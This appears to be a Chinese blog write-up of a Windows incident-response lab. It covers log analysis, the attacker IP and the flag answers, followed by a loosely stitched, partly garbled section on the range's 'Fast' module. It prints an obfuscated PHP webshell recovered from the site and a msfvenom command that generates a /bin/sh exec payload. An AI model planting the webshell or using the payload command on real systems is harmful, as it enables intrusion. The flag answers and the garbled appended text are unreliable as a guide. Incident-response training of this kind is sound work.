Windows应急-应急与研判训练计划 - 玄机靶场

服务器场景操作系统 Windows
服务器账号密码 administrator P@ssw0rd
题目来源公众号 ©州弟学安全

任务环境说明
这是某单位正常运行的主机,但由于安全防范意识不到位,导致系统被攻击。目前已知攻击者成功接管了系统。
需要通过上机排查,利用开放的服务快速识别攻击者的操作、最终攻击成功的方法以及接管成功的IP。相关工具和全程流量数据已放置在桌面中。

1. 你需要根据环境内的所有工具和文件,附件等,根据应急响应形式快速排查出攻击者的所有行为
2. 你需要排查出攻击者最后利用成功的漏洞以及利用成功IP进行整理
3. 你需要自己按照攻击者思路写一份攻击者大概的攻击思路或攻击流程图
4. 你可以借助一切工具,你可以把它当作实战,这里没有任何约束条件

注:样本请勿在本地运行!!!样本请勿在本地运行!!!样本请勿在本地运行!!!
应急响应工程师小王某人收到安全设备告警服务器被植入恶意文件,请上机排查

开放题目
漏洞修复

前瞻:

分析端口-计时任务

检查开放端口-netstat -nao

通过netstat命令,发现 3389 端口(远程桌面)和 80/8080 端口(WEB 服务)开放。

这些端口的开放可能意味着系统可能被远程访问或有 WEB 服务在运行。

根据端口号查看服务-tasklist /fi "PID eq 628"

tasklist|findstr 628

使用cmder工具可以在windows中使用linux中的命令如:cat、awk等等

分析得知,系统使用phpstudy搭建了两个web服务端口分别为80、8080,其中80为静态网站、8080为dedecms网站。服务中间件是nginx,查看nginx日志文件,先查看了一下error.log,发现除了127.0.0.1还有192.168.18.133具有大量访问失败的记录并且访问的网站端口基本都是8080。

使用 awk "{print $1}" access.log | sort | uniq -c 可以统计访问者中源ip地址与其个数

查看access.log文件发现主要记录是127.0.0.1和192.168.18.133,所以几乎可以确定攻击者为:192.168.18.133

使用awk "$9!=404 {print $1,$6,$7,$9}" access.log ,在最后发现一个可疑的命令访问了phpinfo();但是没有成功,恶意文件名应该就是为newfile1.php

awk "$9!=404 {print $1,$6,$7,$9}" access.log | grep POST 过滤POST相关的记录分析得应该是通过弱口令成功登录网站,让后通过网站后台写入木马。

在网站目录下搜索newfile得到了木马文件

<? @("Y;HJ(Z"^"8H;/Z.")(${"~?}$"^"!x8p"}[1]);

使用FullEventLogView工具对系统的事件进行查看发现攻击者的爆破行为与接管的主机192.168.18.1

“使用者”字段指明本地系统上请求登录的帐户。这通常是一个服务(例如 Server 服务)或本地进程(例如 Winlogon.exe 或 Services.exe)。

“登录类型”字段指明发生的登录的种类。最常见的类型是 2 (交互式)和 3 (网络)。

“进程信息”字段表明系统上的哪个帐户和进程请求了登录。

“网络信息”字段指明远程登录请求来自哪里。“工作站名”并非总是可用,而且在某些情况下可能会留为空白。

“身份验证信息”字段提供关于此特定登录请求的详细信息。

-“传递服务”指明哪些直接服务参与了此登录请求。

-“数据包名”指明在 NTLM 协议之间使用了哪些子协议。

-“密钥长度”指明生成的会话密钥的长度。如果没有请求会话密钥,则此字段为 0。

1. 请找出攻击者攻击成功的端口,如多个端口,则从小到大{x,x,x,}

flag{21,3389,8080}

2. 请找出攻击者上传的恶意文件名

flag{newfile1.php}

3. 请找出攻击者最终攻击成功的端口

flag{3389}

4. 请找出攻击者最终攻击成功端口的IP

flag{192.168.18.133}

5. 请找出攻击者最后接管服务器的IP

flag{192.168.18.1}

### 关于玄机靶场 Fast 的使用教程及相关信息 #### 玄机靶场简介 玄机靶场个提供网络安全实验环境的平台,旨在帮助安全研究人员和技术爱好者提升技能。Fast 是该平台上的种特定挑战或模块,通常涉及快速解决问题的能力。 #### Fast 模块特点 Fast 模块设计用于测试参者的反应速度和解决实际问题的能力。参者需要在规定时间内完成系列任务,这些任务可能涉及到漏洞挖掘、渗透测试以及利用已知的安全缺陷来获取目标系统的控制权[^1]。 #### 使用教程概览 为了有效应对 Fast 类型的任务,在进入具体操作之前应当熟悉以下几个方面: - **理解题目背景**:仔细阅读给定的信息,了解所面临的场景是什么样的应用服务(如 Web 应用程序),并识别潜在的风险点。 - **工具准备**:准备好必要的工具集,比如 Burp Suite 用来拦截 HTTP 请求;Metasploit Framework 或者其他自动化攻击框架可以加快进程;还有像 Nmap 这样网络扫描器可以帮助发现开放端口和服务版本等有用情报。 - **实践技巧** - 利用公开资源学习常见漏洞模式及其修复方法; - 掌握如何编写自定义脚本来提高效率,例如 Python 脚本可用于批量处理数据或者执行重复性的动作; - 学会解读日志文件和其他形式的日志记录以追踪异常行为。 对于提到的具体命令 `msfvenom` 来说,这是个强大的 Metasploit 工具,能够生成各种类型的 payload 和 shellcode 。当面对 Linux 平台上的 x86 架构时,可以通过指定参数 `-p linux/x86/exec` 创建个可执行文件,进而通过远程代码执行获得 Shell 访问权限[^3]。 ```bash msfvenom --platform linux -p linux/x86/exec -f py CMD="/bin/sh" -b '\x09\x0a\x20\x00' -a x86 ``` 此命令将会创建段适用于 Linux-x86 架构下的 Python 形式的 Payload ,其中设置了坏字符过滤选项 `-b` 来避免某些特殊字节出现在最终输出中影响正常运行。 #### 实战案例分析 假设有个 CMS 系统存在 SQL 注入漏洞,则可以根据上述原则采取行动。首先确认注入点位置,接着尝试构造恶意查询语句绕过验证机制读取数据库敏感信息甚至进步提权接管服务器。在这个过程中,保持谨慎的态度非常重要,因为任何不当的操作都可能导致不可预见的结果。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值